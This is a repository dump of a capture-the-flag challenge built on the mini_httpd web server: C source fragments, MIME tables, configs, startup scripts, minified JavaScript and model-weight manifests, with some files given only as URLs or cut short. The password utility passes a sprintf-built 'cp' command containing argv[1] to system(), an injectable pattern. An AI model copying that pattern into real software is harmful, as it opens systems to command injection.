        strcpy(l,line);
        getword(w,l,':');
        if(strcmp(user,w)) {
            putline(tfp,line);
            continue;
        }
        else {
            printf("Changing password for user %s\n",user);
            add_password(user,tfp);
            found = 1;
        }
    }
    if(!found) {
        printf("Adding user %s\n",user);
        add_password(user,tfp);
    }
    fclose(f);
    fclose(tfp);
    sprintf(command,"cp %s %s",temp_template,argv[1]);
    system(command);
    unlink(temp_template);
    exit(0);
}

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/index.html:
--------------------------------------------------------------------------------
mini_httpd is running

mini_httpd is running

Looks like you got it working. Congrats.

Here's a link to the mini_httpd web page.

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/match.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/match.c

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/match.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/match.h

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/mime_encodings.txt:
--------------------------------------------------------------------------------
# mime_encodings.txt
#
# A list of file extensions followed by the corresponding MIME encoding.
# Extensions not found in the table proceed to the mime_types table.

Z compress
gz gzip
uu x-uuencode

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/mime_types.txt:
--------------------------------------------------------------------------------
# mime_types.txt
#
# A list of file extensions followed by the corresponding MIME type.
# Extensions not found in the table are returned as text/plain.

a application/octet-stream
aab application/x-authorware-bin
aam application/x-authorware-map
aas application/x-authorware-seg
ai application/postscript
aif audio/x-aiff
aifc audio/x-aiff
aiff audio/x-aiff
asc text/plain; charset=%s
asf video/x-ms-asf
asx video/x-ms-asf
au audio/basic
avi video/x-msvideo
bcpio application/x-bcpio
bin application/octet-stream
bmp image/bmp
cdf application/x-netcdf
class application/x-java-vm
cpio application/x-cpio
cpt application/mac-compactpro
crl application/x-pkcs7-crl
crt application/x-x509-ca-cert
csh application/x-csh
css text/css; charset=%s
dcr application/x-director
dir application/x-director
djv image/vnd.djvu
djvu image/vnd.djvu
dll application/octet-stream
dms application/octet-stream
doc application/msword
dtd text/xml; charset=%s
dump application/octet-stream
dvi application/x-dvi
dxr application/x-director
eps application/postscript
etx text/x-setext
exe application/octet-stream
ez application/andrew-inset
fgd application/x-director
fh image/x-freehand
fh4 image/x-freehand
fh5 image/x-freehand
fh7 image/x-freehand
fhc image/x-freehand
gif image/gif
gtar application/x-gtar
hdf application/x-hdf
hqx application/mac-binhex40
htm text/html; charset=%s
html text/html; charset=%s
ice x-conference/x-cooltalk
ief image/ief
iges model/iges
igs model/iges
iv application/x-inventor
jar application/x-java-archive
jfif image/jpeg
jpe image/jpeg
jpeg image/jpeg
jpg image/jpeg
js application/x-javascript
kar audio/midi
kml application/vnd.google-earth.kml+xml
kmz application/vnd.google-earth.kmz
latex application/x-latex
lha application/octet-stream
loc application/xml-loc
lzh application/octet-stream
m3u audio/x-mpegurl
man application/x-troff-man
mathml application/mathml+xml
me application/x-troff-me
mesh model/mesh
mid audio/midi
midi audio/midi
mif application/vnd.mif
mime message/rfc822
mml application/mathml+xml
mov video/quicktime
movie video/x-sgi-movie
mp2 audio/mpeg
mp3 audio/mpeg
mp4 video/mp4
mpe video/mpeg
mpeg video/mpeg
mpg video/mpeg
mpga audio/mpeg
ms application/x-troff-ms
msh model/mesh
mv video/x-sgi-movie
mxu video/vnd.mpegurl
nc application/x-netcdf
o application/octet-stream
oda application/oda
ogg application/ogg
pac application/x-ns-proxy-autoconfig
pbm image/x-portable-bitmap
pdb chemical/x-pdb
pdf application/pdf
pgm image/x-portable-graymap
pgn application/x-chess-pgn
png image/png
pnm image/x-portable-anymap
ppm image/x-portable-pixmap
ppt application/vnd.ms-powerpoint
ps application/postscript
qt video/quicktime
ra audio/x-realaudio
ram audio/x-pn-realaudio
ras image/x-cmu-raster
rdf application/rdf+xml
rgb image/x-rgb
rm audio/x-pn-realaudio
roff application/x-troff
rpm audio/x-pn-realaudio-plugin
rss application/rss+xml
rtf text/rtf; charset=%s
rtx text/richtext; charset=%s
sgm text/sgml; charset=%s
sgml text/sgml; charset=%s
sh application/x-sh
shar application/x-shar
silo model/mesh
sit application/x-stuffit
skd application/x-koan
skm application/x-koan
skp application/x-koan
skt application/x-koan
smi application/smil
smil application/smil
snd audio/basic
so application/octet-stream
spl application/x-futuresplash
src application/x-wais-source
stc application/vnd.sun.xml.calc.template
std application/vnd.sun.xml.draw.template
sti application/vnd.sun.xml.impress.template
stw application/vnd.sun.xml.writer.template
sv4cpio application/x-sv4cpio
sv4crc application/x-sv4crc
svg image/svg+xml
svgz image/svg+xml
swf application/x-shockwave-flash
sxc application/vnd.sun.xml.calc
sxd application/vnd.sun.xml.draw
sxg application/vnd.sun.xml.writer.global
sxi application/vnd.sun.xml.impress
sxm application/vnd.sun.xml.math
sxw application/vnd.sun.xml.writer
t application/x-troff
tar application/x-tar
tcl application/x-tcl
tex application/x-tex
texi application/x-texinfo
texinfo application/x-texinfo
tif image/tiff
tiff image/tiff
tr application/x-troff
tsp application/dsptype
tsv text/tab-separated-values; charset=%s
txt text/plain; charset=%s
ustar application/x-ustar
vcd application/x-cdlink
vrml model/vrml
vx video/x-rad-screenplay
wav audio/x-wav
wax audio/x-ms-wax
wbmp image/vnd.wap.wbmp
wbxml application/vnd.wap.wbxml
wm video/x-ms-wm
wma audio/x-ms-wma
wmd application/x-ms-wmd
wml text/vnd.wap.wml
wmlc application/vnd.wap.wmlc
wmls text/vnd.wap.wmlscript
wmlsc application/vnd.wap.wmlscriptc
wmv video/x-ms-wmv
wmx video/x-ms-wmx
wmz application/x-ms-wmz
wrl model/vrml
wsrc application/x-wais-source
wvx video/x-ms-wvx
xbm image/x-xbitmap
xht application/xhtml+xml; charset=%s
xhtml application/xhtml+xml; charset=%s
xls application/vnd.ms-excel
xml text/xml; charset=%s
xpm image/x-xpixmap
xsl text/xml; charset=%s
xwd image/x-xwindowdump
xyz chemical/x-xyz
zip application/zip

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/mini_httpd.8:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/mini_httpd.8

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/mini_httpd.cnf:
--------------------------------------------------------------------------------
# create RSA certs - Server

RANDFILE = mini_httpd.rnd

[ req ]
default_bits = 1024
encrypt_key = yes
distinguished_name = req_dn
x509_extensions = cert_type

[ req_dn ]
countryName = Country Name (2 letter code)
countryName_default = PL
countryName_min = 2
countryName_max = 2

stateOrProvinceName = State or Province Name (full name)
stateOrProvinceName_default = Some-State

localityName = Locality Name (eg, city)

0.organizationName = Organization Name (eg, company)
0.organizationName_default = Mini Webservice Ltd

organizationalUnitName = Organizational Unit Name (eg, section)
#organizationalUnitName_default =

0.commonName = Common Name (FQDN of your server)

# To create a certificate for more than one name uncomment:
# 1.commonName = DNS alias of your server
# 2.commonName = DNS alias of your server
# ...
# See http://home.netscape.com/eng/security/ssl_2.0_certificate.html
# to see how Netscape understands commonName.

[ cert_type ]
nsCertType = server

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/port.h:
--------------------------------------------------------------------------------
/* port.h - portability defines */

#if defined(__FreeBSD__)
# define OS_FreeBSD
# define ARCH "FreeBSD"
#elif defined(__OpenBSD__)
# define OS_OpenBSD
# define ARCH "OpenBSD"
#elif defined(__NetBSD__)
# define OS_NetBSD
# define ARCH "NetBSD"
#elif defined(linux)
# define OS_Linux
# define ARCH "Linux"
#elif defined(sun) || defined(SunOS) || defined(Solaris) || defined(__sun__)
# define OS_Solaris
# define ARCH "Solaris"
#elif defined(__osf__)
# define OS_DigitalUnix
# define ARCH "DigitalUnix"
#elif defined(__svr4__)
# define OS_SysV
# define ARCH "SysV"
#else
# define OS_UNKNOWN
# define ARCH "UNKNOWN"
#endif

#ifdef OS_FreeBSD
# include <osreldate.h>
# define HAVE_DAEMON
# define HAVE_SETSID
# define HAVE_SETLOGIN
# define HAVE_WAITPID
# define HAVE_HSTRERROR
# define HAVE_TM_GMTOFF
# define HAVE_SENDFILE
# define HAVE_SCANDIR
# define HAVE_INT64T
# define HAVE_SRANDOMDEV
# ifdef SO_ACCEPTFILTER
#  define HAVE_ACCEPT_FILTERS
#  if ( __FreeBSD_version >= 411000 )
#   define ACCEPT_FILTER_NAME "httpready"
#  else
#   define ACCEPT_FILTER_NAME "dataready"
#  endif
# endif /* SO_ACCEPTFILTER */
#endif /* OS_FreeBSD */

#ifdef OS_OpenBSD
# define HAVE_DAEMON
# define HAVE_SETSID
# define HAVE_SETLOGIN
# define HAVE_WAITPID
# define HAVE_HSTRERROR
# define HAVE_TM_GMTOFF
# define HAVE_SCANDIR
# define HAVE_INT64T
#endif /* OS_OpenBSD */

#ifdef OS_NetBSD
# define HAVE_DAEMON
# define HAVE_SETSID
# define HAVE_SETLOGIN
# define HAVE_WAITPID
# define HAVE_HSTRERROR
# define HAVE_TM_GMTOFF
# define HAVE_SCANDIR
# define HAVE_INT64T
#endif /* OS_NetBSD */

#ifdef OS_Linux
# define HAVE_DAEMON
# define HAVE_SETSID
# define HAVE_WAITPID
# define HAVE_TM_GMTOFF
# define HAVE_SENDFILE
# define HAVE_LINUX_SENDFILE
# define HAVE_SCANDIR
# define HAVE_INT64T
#endif /* OS_Linux */

#ifdef OS_Solaris
# define HAVE_SETSID
# define HAVE_WAITPID
# define HAVE_MEMORY_H
# define HAVE_SIGSET
# define HAVE_INT64T
# define HAVE_RAND
# define HAVE_SENDFILE
# define HAVE_LINUX_SENDFILE
#endif /* OS_Solaris */

#ifdef OS_DigitalUnix
# define HAVE_SETSID
# define HAVE_SETLOGIN
# define HAVE_WAITPID
# define HAVE_SCANDIR
# define HAVE_TM_GMTOFF
# define NO_SNPRINTF
/* # define HAVE_INT64T */ /* Digital Unix 4.0d doesn't have int64_t */
#endif /* OS_DigitalUnix */

#ifdef OS_SysV
# define HAVE_SETSID
# define HAVE_WAITPID
# define HAVE_MEMORY_H
# define HAVE_SIGSET
# define HAVE_RAND
#endif /* OS_SysV */

#ifdef HAVE_RAND
# define srandom srand
# define random rand
#endif /* HAVE_RAND */

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/scripts/500.mini_httpd-rotate:
--------------------------------------------------------------------------------
#!/bin/sh
#
# mini_httpd-rotate - nightly script to rotate mini_httpd's log files on FreeBSD
#
# This goes in /etc/periodic/daily.  It rotates the log files and then
# tells mini_httpd to re-open its log file.

cd /usr/local/www/chroot/logs
rm -f mini_httpd_log.7.gz
mv mini_httpd_log.6.gz mini_httpd_log.7.gz
mv mini_httpd_log.5.gz mini_httpd_log.6.gz
mv mini_httpd_log.4.gz mini_httpd_log.5.gz
mv mini_httpd_log.3.gz mini_httpd_log.4.gz
mv mini_httpd_log.2.gz mini_httpd_log.3.gz
mv mini_httpd_log.1.gz mini_httpd_log.2.gz
mv mini_httpd_log mini_httpd_log.1
kill -HUP `cat /var/run/mini_httpd.pid`
sleep 1
gzip -f mini_httpd_log.1

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/scripts/mini_httpd.sh:
--------------------------------------------------------------------------------
#!/bin/sh
#
# mini_httpd.sh - startup script for mini_httpd on FreeBSD
#
# This should be manually installed as:
#   /usr/local/etc/rc.d/mini_httpd
# It gets run at boot-time.
#
# Variables available:
#   mini_httpd_enable='YES'
#   mini_httpd_program='/usr/local/sbin/mini_httpd'
#   mini_httpd_pidfile='/var/run/mini_httpd.pid'
#   mini_httpd_devfs=...
#   mini_httpd_flags=...
#
# PROVIDE: mini_httpd
# REQUIRE: LOGIN FILESYSTEMS
# KEYWORD: shutdown

. /etc/rc.subr

name='mini_httpd'
rcvar='mini_httpd_enable'
start_precmd='mini_httpd_precmd'
mini_httpd_enable_defval='NO'

load_rc_config "$name"
command="${mini_httpd_program:-/usr/local/sbin/${name}}"
pidfile="${mini_httpd_pidfile:-/var/run/${name}.pid}"
command_args="-i ${pidfile}"

mini_httpd_precmd ()
{
    if [ -n "$mini_httpd_devfs" ] ; then
        mount -t devfs devfs "$mini_httpd_devfs"
        devfs -m "$mini_httpd_devfs" rule -s 1 applyset
        devfs -m "$mini_httpd_devfs" rule -s 2 applyset
    fi
}

run_rc_command "$1"

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/scripts/mini_httpd_wrapper:
--------------------------------------------------------------------------------
#!/bin/sh
#
# mini_httpd_wrapper - wrapper script for mini_httpd on FreeBSD
#
# This goes in /usr/local/sbin.  It backgrounds itself, and then runs
# mini_httpd in a loop.  If mini_httpd exits then the script restarts
# it automatically.
#
# The -D flag tells mini_httpd to *not* put itself into the background,
# and the -C flag tells it to get the rest of its configuration from
# the specified config file.

(
    while true ; do
        /usr/local/sbin/mini_httpd -D -C /usr/local/www/mini_httpd_config
        if [ -f /var/run/nologin ] ; then
            exit
        fi
        sleep 10
        egrep ' mini_httpd[:\[]' /var/log/messages |
            tail -33 |
            mail -s "mini_httpd on `hostname` restarted" root
    done
) &

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/tdate_parse.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/tdate_parse.c

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/tdate_parse.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/tdate_parse.h

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/version.h:
--------------------------------------------------------------------------------
/* version.h - version defines for mini_httpd */

#ifndef _VERSION_H_
#define _VERSION_H_

#define SERVER_SOFTWARE "trusted_httpd/1.0 Author: Eqqie@d3ctf"
#define SERVER_URL "https://d3ctf.io/#/"

#endif /* _VERSION_H_ */

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/www/bootstrap-treeview.min.css:
--------------------------------------------------------------------------------
.treeview .list-group-item {
    cursor: pointer
}

.treeview span.indent {
    margin-left: 10px;
    margin-right: 10px
}

.treeview span.icon {
    width: 12px;
    margin-right: 5px
13 | } 14 | 15 | .treeview .node-disabled { 16 | color: silver; 17 | cursor: not-allowed 18 | } -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/bootstrap-treeview.min.js: -------------------------------------------------------------------------------- 1 | !function(a,b,c,d){"use strict";var e="treeview",f={};f.settings={injectStyle:!0,levels:2,expandIcon:"glyphicon glyphicon-plus",collapseIcon:"glyphicon glyphicon-minus",emptyIcon:"glyphicon",nodeIcon:"",selectedIcon:"",checkedIcon:"glyphicon glyphicon-check",uncheckedIcon:"glyphicon glyphicon-unchecked",color:d,backColor:d,borderColor:d,onhoverColor:"#F5F5F5",selectedColor:"#FFFFFF",selectedBackColor:"#428bca",searchResultColor:"#D9534F",searchResultBackColor:d,enableLinks:!1,highlightSelected:!0,highlightSearchResults:!0,showBorder:!0,showIcon:!0,showCheckbox:!1,showTags:!1,multiSelect:!1,onNodeChecked:d,onNodeCollapsed:d,onNodeDisabled:d,onNodeEnabled:d,onNodeExpanded:d,onNodeSelected:d,onNodeUnchecked:d,onNodeUnselected:d,onSearchComplete:d,onSearchCleared:d},f.options={silent:!1,ignoreChildren:!1},f.searchOptions={ignoreCase:!0,exactMatch:!1,revealResults:!0};var g=function(b,c){return 
this.$element=a(b),this.elementId=b.id,this.styleId=this.elementId+"-style",this.init(c),{options:this.options,init:a.proxy(this.init,this),remove:a.proxy(this.remove,this),getNode:a.proxy(this.getNode,this),getParent:a.proxy(this.getParent,this),getSiblings:a.proxy(this.getSiblings,this),getSelected:a.proxy(this.getSelected,this),getUnselected:a.proxy(this.getUnselected,this),getExpanded:a.proxy(this.getExpanded,this),getCollapsed:a.proxy(this.getCollapsed,this),getChecked:a.proxy(this.getChecked,this),getUnchecked:a.proxy(this.getUnchecked,this),getDisabled:a.proxy(this.getDisabled,this),getEnabled:a.proxy(this.getEnabled,this),selectNode:a.proxy(this.selectNode,this),unselectNode:a.proxy(this.unselectNode,this),toggleNodeSelected:a.proxy(this.toggleNodeSelected,this),collapseAll:a.proxy(this.collapseAll,this),collapseNode:a.proxy(this.collapseNode,this),expandAll:a.proxy(this.expandAll,this),expandNode:a.proxy(this.expandNode,this),toggleNodeExpanded:a.proxy(this.toggleNodeExpanded,this),revealNode:a.proxy(this.revealNode,this),checkAll:a.proxy(this.checkAll,this),checkNode:a.proxy(this.checkNode,this),uncheckAll:a.proxy(this.uncheckAll,this),uncheckNode:a.proxy(this.uncheckNode,this),toggleNodeChecked:a.proxy(this.toggleNodeChecked,this),disableAll:a.proxy(this.disableAll,this),disableNode:a.proxy(this.disableNode,this),enableAll:a.proxy(this.enableAll,this),enableNode:a.proxy(this.enableNode,this),toggleNodeDisabled:a.proxy(this.toggleNodeDisabled,this),search:a.proxy(this.search,this),clearSearch:a.proxy(this.clearSearch,this)}};g.prototype.init=function(b){this.tree=[],this.nodes=[],b.data&&("string"==typeof b.data&&(b.data=a.parseJSON(b.data)),this.tree=a.extend(!0,[],b.data),delete 
b.data),this.options=a.extend({},f.settings,b),this.destroy(),this.subscribeEvents(),this.setInitialStates({nodes:this.tree},0),this.render()},g.prototype.remove=function(){this.destroy(),a.removeData(this,e),a("#"+this.styleId).remove()},g.prototype.destroy=function(){this.initialized&&(this.$wrapper.remove(),this.$wrapper=null,this.unsubscribeEvents(),this.initialized=!1)},g.prototype.unsubscribeEvents=function(){this.$element.off("click"),this.$element.off("nodeChecked"),this.$element.off("nodeCollapsed"),this.$element.off("nodeDisabled"),this.$element.off("nodeEnabled"),this.$element.off("nodeExpanded"),this.$element.off("nodeSelected"),this.$element.off("nodeUnchecked"),this.$element.off("nodeUnselected"),this.$element.off("searchComplete"),this.$element.off("searchCleared")},g.prototype.subscribeEvents=function(){this.unsubscribeEvents(),this.$element.on("click",a.proxy(this.clickHandler,this)),"function"==typeof this.options.onNodeChecked&&this.$element.on("nodeChecked",this.options.onNodeChecked),"function"==typeof this.options.onNodeCollapsed&&this.$element.on("nodeCollapsed",this.options.onNodeCollapsed),"function"==typeof this.options.onNodeDisabled&&this.$element.on("nodeDisabled",this.options.onNodeDisabled),"function"==typeof this.options.onNodeEnabled&&this.$element.on("nodeEnabled",this.options.onNodeEnabled),"function"==typeof this.options.onNodeExpanded&&this.$element.on("nodeExpanded",this.options.onNodeExpanded),"function"==typeof this.options.onNodeSelected&&this.$element.on("nodeSelected",this.options.onNodeSelected),"function"==typeof this.options.onNodeUnchecked&&this.$element.on("nodeUnchecked",this.options.onNodeUnchecked),"function"==typeof this.options.onNodeUnselected&&this.$element.on("nodeUnselected",this.options.onNodeUnselected),"function"==typeof this.options.onSearchComplete&&this.$element.on("searchComplete",this.options.onSearchComplete),"function"==typeof 
this.options.onSearchCleared&&this.$element.on("searchCleared",this.options.onSearchCleared)},g.prototype.setInitialStates=function(b,c){if(b.nodes){c+=1;var d=b,e=this;a.each(b.nodes,function(a,b){b.nodeId=e.nodes.length,b.parentId=d.nodeId,b.hasOwnProperty("selectable")||(b.selectable=!0),b.state=b.state||{},b.state.hasOwnProperty("checked")||(b.state.checked=!1),b.state.hasOwnProperty("disabled")||(b.state.disabled=!1),b.state.hasOwnProperty("expanded")||(!b.state.disabled&&c0?b.state.expanded=!0:b.state.expanded=!1),b.state.hasOwnProperty("selected")||(b.state.selected=!1),e.nodes.push(b),b.nodes&&e.setInitialStates(b,c)})}},g.prototype.clickHandler=function(b){this.options.enableLinks||b.preventDefault();var c=a(b.target),d=this.findNode(c);if(d&&!d.state.disabled){var e=c.attr("class")?c.attr("class").split(" "):[];-1!==e.indexOf("expand-icon")?(this.toggleExpandedState(d,f.options),this.render()):-1!==e.indexOf("check-icon")?(this.toggleCheckedState(d,f.options),this.render()):(d.selectable?this.toggleSelectedState(d,f.options):this.toggleExpandedState(d,f.options),this.render())}},g.prototype.findNode=function(a){var b=a.closest("li.list-group-item").attr("data-nodeid"),c=this.nodes[b];return c||console.log("Error: node does not 
exist"),c},g.prototype.toggleExpandedState=function(a,b){a&&this.setExpandedState(a,!a.state.expanded,b)},g.prototype.setExpandedState=function(b,c,d){c!==b.state.expanded&&(c&&b.nodes?(b.state.expanded=!0,d.silent||this.$element.trigger("nodeExpanded",a.extend(!0,{},b))):c||(b.state.expanded=!1,d.silent||this.$element.trigger("nodeCollapsed",a.extend(!0,{},b)),b.nodes&&!d.ignoreChildren&&a.each(b.nodes,a.proxy(function(a,b){this.setExpandedState(b,!1,d)},this))))},g.prototype.toggleSelectedState=function(a,b){a&&this.setSelectedState(a,!a.state.selected,b)},g.prototype.setSelectedState=function(b,c,d){c!==b.state.selected&&(c?(this.options.multiSelect||a.each(this.findNodes("true","g","state.selected"),a.proxy(function(a,b){this.setSelectedState(b,!1,d)},this)),b.state.selected=!0,d.silent||this.$element.trigger("nodeSelected",a.extend(!0,{},b))):(b.state.selected=!1,d.silent||this.$element.trigger("nodeUnselected",a.extend(!0,{},b))))},g.prototype.toggleCheckedState=function(a,b){a&&this.setCheckedState(a,!a.state.checked,b)},g.prototype.setCheckedState=function(b,c,d){c!==b.state.checked&&(c?(b.state.checked=!0,d.silent||this.$element.trigger("nodeChecked",a.extend(!0,{},b))):(b.state.checked=!1,d.silent||this.$element.trigger("nodeUnchecked",a.extend(!0,{},b))))},g.prototype.setDisabledState=function(b,c,d){c!==b.state.disabled&&(c?(b.state.disabled=!0,this.setExpandedState(b,!1,d),this.setSelectedState(b,!1,d),this.setCheckedState(b,!1,d),d.silent||this.$element.trigger("nodeDisabled",a.extend(!0,{},b))):(b.state.disabled=!1,d.silent||this.$element.trigger("nodeEnabled",a.extend(!0,{},b))))},g.prototype.render=function(){this.initialized||(this.$element.addClass(e),this.$wrapper=a(this.template.list),this.injectStyle(),this.initialized=!0),this.$element.empty().append(this.$wrapper.empty()),this.buildTree(this.tree,0)},g.prototype.buildTree=function(b,c){if(b){c+=1;var d=this;a.each(b,function(b,e){for(var 
f=a(d.template.item).addClass("node-"+d.elementId).addClass(e.state.checked?"node-checked":"").addClass(e.state.disabled?"node-disabled":"").addClass(e.state.selected?"node-selected":"").addClass(e.searchResult?"search-result":"").attr("data-nodeid",e.nodeId).attr("style",d.buildStyleOverride(e)),g=0;c-1>g;g++)f.append(d.template.indent);var h=[];if(e.nodes?(h.push("expand-icon"),h.push(e.state.expanded?d.options.collapseIcon:d.options.expandIcon)):h.push(d.options.emptyIcon),f.append(a(d.template.icon).addClass(h.join(" "))),d.options.showIcon){var h=["node-icon"];h.push(e.icon||d.options.nodeIcon),e.state.selected&&(h.pop(),h.push(e.selectedIcon||d.options.selectedIcon||e.icon||d.options.nodeIcon)),f.append(a(d.template.icon).addClass(h.join(" ")))}if(d.options.showCheckbox){var h=["check-icon"];h.push(e.state.checked?d.options.checkedIcon:d.options.uncheckedIcon),f.append(a(d.template.icon).addClass(h.join(" ")))}return f.append(d.options.enableLinks?a(d.template.link).attr("href",e.href).append(e.text):e.text),d.options.showTags&&e.tags&&a.each(e.tags,function(b,c){f.append(a(d.template.badge).append(c))}),d.$wrapper.append(f),e.nodes&&e.state.expanded&&!e.state.disabled?d.buildTree(e.nodes,c):void 0})}},g.prototype.buildStyleOverride=function(a){if(a.state.disabled)return"";var b=a.color,c=a.backColor;return this.options.highlightSelected&&a.state.selected&&(this.options.selectedColor&&(b=this.options.selectedColor),this.options.selectedBackColor&&(c=this.options.selectedBackColor)),this.options.highlightSearchResults&&a.searchResult&&!a.state.disabled&&(this.options.searchResultColor&&(b=this.options.searchResultColor),this.options.searchResultBackColor&&(c=this.options.searchResultBackColor)),"color:"+b+";background-color:"+c+";"},g.prototype.injectStyle=function(){this.options.injectStyle&&!c.getElementById(this.styleId)&&a('").appendTo("head")},g.prototype.buildStyle=function(){var a=".node-"+this.elementId+"{";return 
this.options.color&&(a+="color:"+this.options.color+";"),this.options.backColor&&(a+="background-color:"+this.options.backColor+";"),this.options.showBorder?this.options.borderColor&&(a+="border:1px solid "+this.options.borderColor+";"):a+="border:none;",a+="}",this.options.onhoverColor&&(a+=".node-"+this.elementId+":not(.node-disabled):hover{background-color:"+this.options.onhoverColor+";}"),this.css+a},g.prototype.template={list:'

    ',item:'
--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/www/index.html:
--------------------------------------------------------------------------------
Trusted Site

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/www/login.html:
--------------------------------------------------------------------------------
Trusted Site

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/www/weights/age_gender_model-shard1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/age_gender_model-shard1

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/www/weights/age_gender_model-weights_manifest.json:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/www/weights/face_expression_model-shard1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/face_expression_model-shard1

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/www/weights/face_expression_model-weights_manifest.json:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/www/weights/face_landmark_68_model-shard1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/face_landmark_68_model-shard1

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/www/weights/face_landmark_68_model-weights_manifest.json:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/www/weights/face_landmark_68_tiny_model-shard1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/face_landmark_68_tiny_model-shard1

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/www/weights/face_landmark_68_tiny_model-weights_manifest.json:
--------------------------------------------------------------------------------
18281}},{"name":"dense1/conv0/pointwise_filter","shape":[1,1,32,64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.014611541991140328,"min":-1.8556658328748217}},{"name":"dense1/conv0/bias","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.002832523046755323,"min":-0.30307996600281956}},{"name":"dense1/conv1/depthwise_filter","shape":[3,3,64,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.006593170586754294,"min":-0.6329443763284123}},{"name":"dense1/conv1/pointwise_filter","shape":[1,1,64,64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.012215249211180444,"min":-1.6001976466646382}},{"name":"dense1/conv1/bias","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.002384825547536214,"min":-0.3028728445370992}},{"name":"dense1/conv2/depthwise_filter","shape":[3,3,64,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.005859645441466687,"min":-0.7617539073906693}},{"name":"dense1/conv2/pointwise_filter","shape":[1,1,64,64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.013121426806730382,"min":-1.7845140457153321}},{"name":"dense1/conv2/bias","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0032247188044529336,"min":-0.46435950784122243}},{"name":"dense2/conv0/depthwise_filter","shape":[3,3,64,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.002659512618008782,"min":-0.32977956463308894}},{"name":"dense2/conv0/pointwise_filter","shape":[1,1,64,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.015499923743453681,"min":-1.9839902391620712}},{"name":"dense2/conv0/bias","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0032450980999890497,"min":-0.522460794098237}},{"name":"dense2/conv1/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.005911862382701799,"min":-0.792189559282041}},{"name":"dense2/conv1/pointwise_filter","shape":[1,1,128,128],
